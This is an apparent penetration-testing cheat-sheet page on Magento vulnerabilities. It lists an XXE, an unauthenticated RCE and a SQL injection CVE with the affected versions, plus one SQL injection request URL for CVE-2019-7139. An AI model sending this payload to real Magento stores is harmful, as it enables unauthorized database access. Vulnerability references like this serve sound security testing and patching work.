Magento

Magento exploits

Enumeration

CVE-2024-34102

CVE-2024-34102 affects Adobe Commerce / Magento versions 2.4.6 and earlier.

XML External Entity Reference (XXE) vulnerability that could result in arbitrary code execution

CVE-2022-24086 - Unauth RCE

Magento Open Source / Adobe Commerce - 2.3.3-p1 - 2.3.7-p2

Magento Open Source / Adobe Commerce - 2.4.0 - 2.4.3-p1

CVE-2019-7139 - SQLi

    https://magento2website.com/catalog/product_frontend_action/synchronize?
    type_id=recently_products&
    ids[0][added_at]=&
    ids[0][product_id][from]=?&
    ids[0][product_id][to]=))) OR (SELECT 1 UNION SELECT 2 FROM DUAL WHERE 1=1) -- -

Interesting Books

Interesting Books

Disclaimer: As an Amazon Associate, I earn from qualifying purchases. This helps support this GitBook project at no extra cost to you.

Last updated